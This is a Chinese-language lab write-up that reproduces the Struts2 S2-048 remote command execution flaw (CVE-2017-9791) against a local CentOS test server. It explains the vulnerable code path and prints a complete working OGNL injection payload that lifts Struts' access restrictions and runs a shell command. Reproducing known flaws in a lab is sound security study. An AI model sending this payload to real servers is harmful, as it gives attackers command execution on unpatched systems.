搭建centos服務器環境事實上是爲了復現CVE-2017-9791 Struts(S2-048遠程命令執行漏洞)
一、 漏洞分析
原理:在Struts2.3.x 系列的Showcase應用中演示Struts2整合Struts1的插件中存在一處任意代碼執行漏洞。當應用使用了Struts2 Struts1的插件時,可能導致不受信任的輸入傳入到ActionMessage類中導致命令執行。
具體分析(以struts2.3.24版本爲例):
漏洞觸發位置在SaveGangsterAction.java中,
在struts2中開啓了struts1的插件,org.apache.struts2.s1.Struts1Action類是把封裝了struts1的Action 以便兼容在struts2中。
首先這裏ActionForwardforward = action.execute(mapping, actionForm, request, response);會把表單的請求處理回顯給客戶端。
然後addActionMessage(getText(msg.getKey(),Arrays.asList(msg.getValues())));這裏又調用了getText方法會把action messages傳遞給com.opensymphony.xwork2.util.LocalizedTextUtil.getDefaultMessage。
最後在其中又調用了com.opensymphony.xwork2.util.TextParseUtil.translateVariables,它用來調用OGNL 表達式用處理字符串表達式。漏洞利用OGNL表達式執行任意命令。
二、 實驗環境
1. 靶機:centOS 7.3 :https://www.centos.org/download/
2. 攻擊機: Windows10 64-bit
三、 實驗結果
//實驗操作的完整步驟
首先搭建實驗環境,這裏使用的靶機環境爲centOS 7.3 64-bit
在對應網站下載受影響的struts2版本具體影響範圍爲struts2.3.*
這裏使用了struts2.3.24進行漏洞復現
將struts2-showcase.war放到tomcat/webapps目錄下,首先進行本地測試服務是否完好
服務器靶機:curl 127.0.0.1:8080\
發現有response說明服務完好。查詢本機ip地址爲192.168.36.128
那麼在攻擊機上進行基本訪問
這裏UA使用firefox,url:http://192.168.36.128:8080/struts2-showcase/integration/editGangster.action
驗證漏洞:在Gangster Name中提交${1+1}發現最終1+1被執行
說明漏洞存在
於是構造payload:name=${(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="ifconfig").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=111&__checkbox_bustedBefore=true&description=
其中加粗的地方爲可執行的命令
這裏面遇到一個坑,調了很久不知道哪裏出了問題。。就是我在直接提交payload的時候發現返回name字段不能爲空,加一個回車換行就可以,具體在驗證腳本中有寫到。
Burpsuite抓包修改重放可以看到
成功執行了ifconfig命令
於是寫腳本驗證,腳本主體如下:
由於需要換行(最後還是不知道爲什麼)於是在藍色箭頭處手動添加換行符。
執行腳本
服務器端信息:
至此、漏洞驗證過程完畢